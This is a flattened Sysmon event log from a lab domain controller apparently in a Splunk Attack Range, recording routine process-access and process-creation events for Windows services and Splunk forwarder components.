13:42:45.379{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:45.379{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:45.379{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:45.379{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:45.379{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:45.379{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:45.379{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:45.379{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:45.379{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9055-6005-1601-00000000A301}4380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:45.379{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9055-6005-1601-00000000A301}4380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:45.379{59A5CD1D-9055-6005-1601-00000000A301}4380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:46.051{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9056-6005-1701-00000000A301}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:46.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:46.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:46.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:46.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:46.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:46.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:46.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:46.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:46.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:46.051{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9056-6005-1701-00000000A301}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:46.051{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9056-6005-1701-00000000A301}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:46.051{59A5CD1D-9056-6005-1701-00000000A301}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:47.347{59A5CD1D-9057-6005-1801-00000000A301}42204392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:47.207{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9057-6005-1801-00000000A301}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 